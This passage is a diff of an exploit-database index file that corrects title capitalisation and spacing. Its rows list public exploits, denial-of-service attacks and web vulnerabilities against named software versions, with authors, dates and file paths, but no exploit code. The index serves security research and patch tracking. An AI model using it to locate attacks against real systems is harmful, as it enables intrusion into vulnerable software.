Injection",2012-05-13,sbz,php,webapps,0 -18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - '.mef'Denial of Service",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 +18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - '.mef' Denial of Service",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution",2012-05-19,Metasploit,multiple,remote,0 18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager - Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 @@ -16376,13 +16378,13 @@ id,file,description,date,author,platform,type,port 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injections",2012-05-28,loneferret,php,webapps,0 18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos,0 -18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 -18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 - '.rtf'FileOpen Crash",2012-05-28,shinnai,windows,dos,0 +18946,platforms/windows/dos/18946.txt,"TFTPD32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 +18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 - '.rtf' FileOpen Crash",2012-05-28,shinnai,windows,dos,0 18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 18947,platforms/windows/local/18947.rb,"ispVM System - .XCF File Handling Overflow",2012-05-29,Metasploit,windows,local,0 18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injections",2012-05-29,loneferret,php,webapps,0 19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Buffer Overflow",2012-06-08,Metasploit,windows,remote,0 -18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - '.doc'Null Pointer Dereference",2012-05-30,condis,windows,dos,0 +18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - '.doc' Null Pointer Dereference",2012-05-30,condis,windows,dos,0 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 18954,platforms/windows/local/18954.rb,"MPlayer - .SAMI Subtitle File Buffer Overflow",2012-05-30,Metasploit,windows,local,0 18955,platforms/php/webapps/18955.txt,"Simple Web Content Management System 1.1-1.3 - Multiple SQL Injections",2012-05-30,loneferret,php,webapps,0 @@ -16419,7 +16421,7 @@ id,file,description,date,author,platform,type,port 19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News 1.2 - (/admin/loger.php) Authentication Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 -19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC'Exploit",2012-06-07,b33f,windows,local,0 +19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit",2012-06-07,b33f,windows,local,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution",2012-06-06,Metasploit,windows,remote,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution",2012-06-10,Metasploit,windows,remote,0 @@ -16487,8 +16489,8 @@ id,file,description,date,author,platform,type,port 19083,platforms/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 - Share",1998-06-10,"Paul Boyer",windows,remote,0 19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1 - Exploit",1998-06-30,"Jeff Forristal",multiple,remote,0 19085,platforms/linux/dos/19085.c,"Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos,0 -19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath Exploit (1)",1999-02-09,"smiler and cossack",linux,remote,21 -19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath Exploit (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 +19086,platforms/linux/remote/19086.c,"WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (1)",1999-02-09,"smiler and cossack",linux,remote,21 +19087,platforms/linux/remote/19087.c,"WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos,0 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL - Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 @@ -16839,8 +16841,8 @@ id,file,description,date,author,platform,type,port 19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 - Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5.0 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 -19475,platforms/linux/remote/19475.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 -19476,platforms/linux/remote/19476.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 +19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 +19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 19477,platforms/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service",1999-08-31,anonymous,hardware,dos,0 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 @@ -16867,7 +16869,7 @@ id,file,description,date,author,platform,type,port 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 -19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf",1999-09-17,"Tymm Twillman",linux,remote,0 +19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 @@ -16923,7 +16925,7 @@ id,file,description,date,author,platform,type,port 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0 19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - Javascript URL Redirection",1999-10-18,"Georgi Guninski",windows,remote,0 -19560,platforms/multiple/remote/19560.c,"Washington University wu-ftpd 2.5.0 - message Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0 +19560,platforms/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - message Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",windows,dos,0 19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 @@ -17050,7 +17052,7 @@ id,file,description,date,author,platform,type,port 19687,platforms/freebsd/dos/19687.c,"Real Networks Real Server 5.0 - ramgen Denial of Service",1999-12-23,bow,freebsd,dos,0 19688,platforms/windows/remote/19688.txt,"ZBServer Pro 1.5 - Buffer Overflow (1)",1999-12-23,"Ussr Labs",windows,remote,0 19689,platforms/windows/remote/19689.c,"ZBServer Pro 1.5 - Buffer Overflow (2)",1999-12-23,Izan,windows,remote,0 -19690,platforms/unix/remote/19690.txt,"GlFtpd 1.17.2 - Exploit",1999-12-23,suid,unix,remote,0 +19690,platforms/unix/remote/19690.txt,"glFTPd 1.17.2 - Exploit",1999-12-23,suid,unix,remote,0 19691,platforms/multiple/remote/19691.pl,"Tony Greenwood WebWho+ 1.1 - Remote Command Execution",1999-12-26,loophole,multiple,remote,0 19692,platforms/multiple/local/19692.c,"Netscape Communicator 4.5 - prefs.js Buffer Overflow",1999-12-24,"Steve Fewer",multiple,local,0 19693,platforms/linux/local/19693.txt,"Python - Untrusted Search Path/Code Execution",2012-07-09,rogueclown,linux,local,0 @@ -17311,7 +17313,7 @@ id,file,description,date,author,platform,type,port 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 - File Duplication / Source Disclosure",2000-05-24,"Cerberus Security Team",windows,remote,0 19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service - 0x6c Buffer Overflow",2012-07-20,Metasploit,windows,remote,0 19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service - 0x4c Buffer Overflow",2012-07-20,Metasploit,windows,remote,998 -19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - .LWP File Parsing Stack-Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 +19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - .LWP File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Windows 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 @@ -17375,9 +17377,9 @@ id,file,description,date,author,platform,type,port 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 - Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0 20028,platforms/windows/remote/20028.rb,"Simple Web Server - Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0 20029,platforms/php/webapps/20029.rb,"EGallery - PHP File Upload",2012-07-23,Metasploit,php,webapps,0 -20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 -20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 -20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 +20030,platforms/unix/remote/20030.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 +20031,platforms/linux/remote/20031.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 +20032,platforms/lin_x86/remote/20032.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow",2012-07-23,mr.pr0n,windows,local,0 @@ -17662,7 +17664,7 @@ id,file,description,date,author,platform,type,port 20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (2)",1998-03-17,Rootshell,hardware,dos,0 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0 20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x - Brute-Force",2000-10-29,Craig,windows,remote,0 -20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - '.htw'Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 +20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",multiple,dos,0 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 @@ -17742,7 +17744,7 @@ id,file,description,date,author,platform,type,port 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0 -20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms'Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0 +20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0 20416,platforms/php/webapps/20416.txt,"Wordpress Mz-jajak plugin 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0 20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 @@ -17784,7 +17786,7 @@ id,file,description,date,author,platform,type,port 20456,platforms/windows/local/20456.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_showcolv Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0 20457,platforms/windows/local/20457.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_peekqueue Buffer Overflow",2000-12-01,@stake,windows,local,0 20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",linux,local,0 -20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE'",2000-12-01,Key,windows,remote,0 +20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit",2000-12-01,Key,windows,remote,0 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - PhoneBook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0 @@ -17856,7 +17858,7 @@ id,file,description,date,author,platform,type,port 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Arbitrary Command Execution",2001-01-07,scott,cgi,remote,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0 20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Denial of Service (Possible Code Execution)",2001-01-09,"Marc Lehmann",linux,dos,0 -20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 +20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 - Backdoor Password",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 - Incorrect File Permissions",2001-01-11,"Tamer Sahin",php,webapps,0 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload",2012-08-15,ICheer_No0M,php,webapps,0 @@ -17872,7 +17874,7 @@ id,file,description,date,author,platform,type,port 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - Cross-Site Request Forgery",2012-08-16,DaOne,php,webapps,0 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) - Remote Execution",2012-08-16,iJoo,linux,remote,0 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4.0 / Outlook 2000/5.5 - MSHTML.dll Crash",2001-01-15,"Thor Larholm",windows,dos,0 -20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - '.wmz'Arbitrary Java Applet",2001-01-15,"Georgi Guninski",windows,remote,0 +20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet",2001-01-15,"Georgi Guninski",windows,remote,0 20554,platforms/linux/local/20554.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (1)",2001-01-13,IhaQueR,linux,local,0 20555,platforms/linux/local/20555.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)",2001-01-13,IhaQueR,linux,local,0 20556,platforms/linux/local/20556.c,"Debian Linux 2.2 - splitvt Format String",2001-01-16,"Michel Kaempf",linux,local,0 @@ -17882,7 +17884,7 @@ id,file,description,date,author,platform,type,port 20560,platforms/unix/local/20560.c,"SSH 1.2.x - Secure-RPC Weak Encrypted Authentication",2001-01-16,"Richard Silverman",unix,local,0 20561,platforms/linux/dos/20561.pl,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (1)",1997-06-12,"Frank DENIS",linux,dos,0 20562,platforms/linux/dos/20562.c,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (2)",1997-06-12,"Wietse Venema",linux,dos,0 -20563,platforms/unix/remote/20563.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion",1999-12-20,suid,unix,remote,0 +20563,platforms/unix/remote/20563.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion",1999-12-20,suid,unix,remote,0 20564,platforms/windows/dos/20564.txt,"Microsoft Windows NT 4.0 - SNMP-WINS Denial of Service",1997-10-07,CRouland,windows,dos,0 20565,platforms/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A - LCD Display Modification",1997-12-08,sili,hardware,remote,0 20566,platforms/linux/dos/20566.c,"Linux Kernel 2.1.89 / 2.2.x - Zero-Length Fragment",1997-12-08,"John McDonald",linux,dos,0 @@ -17914,7 +17916,7 @@ id,file,description,date,author,platform,type,port 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0 20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - ipfw Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 -20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0 +20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0 20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0 20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 - Networking Mutex Denial of Service",2001-01-24,"Arne Vidstrom",windows,dos,0 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0 @@ -17975,12 +17977,12 @@ id,file,description,date,author,platform,type,port 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0 20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal",2001-02-27,slipy,windows,remote,0 -20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - '.joerc'Arbitrary Command Execution",2001-02-28,"Wkit Security",unix,local,0 +20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution",2001-02-28,"Wkit Security",unix,local,0 20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Arbitrary Command Execution",2001-02-14,"Marc Roessler",unix,remote,0 20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal",2001-03-06,se00020,windows,remote,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 -20663,platforms/windows/remote/20663.txt,"whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,windows,remote,0 +20663,platforms/windows/remote/20663.txt,"WhitSoft slimserve ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,windows,remote,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 20665,platforms/php/webapps/20665.txt,"T-dah Webmail - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-08-20,"Yakir Wizman",php,webapps,0 20666,platforms/php/webapps/20666.html,"ClipBucket 2.5 - Cross-Site Request Forgery",2012-08-20,DaOne,php,webapps,0 @@ -18008,7 +18010,7 @@ id,file,description,date,author,platform,type,port 20687,platforms/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Directory Disclosure",2001-03-16,"Roberto Moreno",windows,remote,0 20688,platforms/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution",2001-03-18,http-equiv,windows,remote,0 20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 - s.cgi Buffer Overflow",2001-03-19,teleh0r,cgi,remote,0 -20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPD 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion",2001-03-15,"Frank DENIS",linux,remote,0 +20690,platforms/linux/remote/20690.sh,"WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion",2001-03-15,"Frank DENIS",linux,remote,0 20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 - mount Buffer Overflow",2001-03-13,"Frank DENIS",linux,local,0 20692,platforms/multiple/remote/20692.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (1)",2001-06-13,rfp,multiple,remote,0 20693,platforms/multiple/remote/20693.c,"Apache 1.3 - Artificially Long Slash Path Directory Listing (2)",2002-02-21,st0ic,multiple,remote,0 @@ -18038,7 +18040,7 @@ id,file,description,date,author,platform,type,port 20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",php,webapps,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 -20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 +20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd - glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 20734,platforms/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service",2001-04-06,"Claudiu Calomfirescu",hardware,dos,0 20735,platforms/sco/dos/20735.txt,"SCO OpenServer 5.0.6 - lpadmin Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 @@ -18105,7 +18107,7 @@ id,file,description,date,author,platform,type,port 20800,platforms/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (2)",2000-01-11,missnglnk,cgi,remote,0 20801,platforms/cgi/remote/20801.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (3)",2000-01-20,ytcracker,cgi,remote,0 20802,platforms/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service",1997-06-21,"Andrea Arcangeli",windows,dos,0 -20803,platforms/windows/remote/20803.txt,"raidenftpd 2.1 - Directory Traversal",2001-04-25,joetesta,windows,remote,0 +20803,platforms/windows/remote/20803.txt,"RaidenFTPd 2.1 - Directory Traversal",2001-04-25,joetesta,windows,remote,0 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage",2001-04-26,V9,irix,local,0 20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed 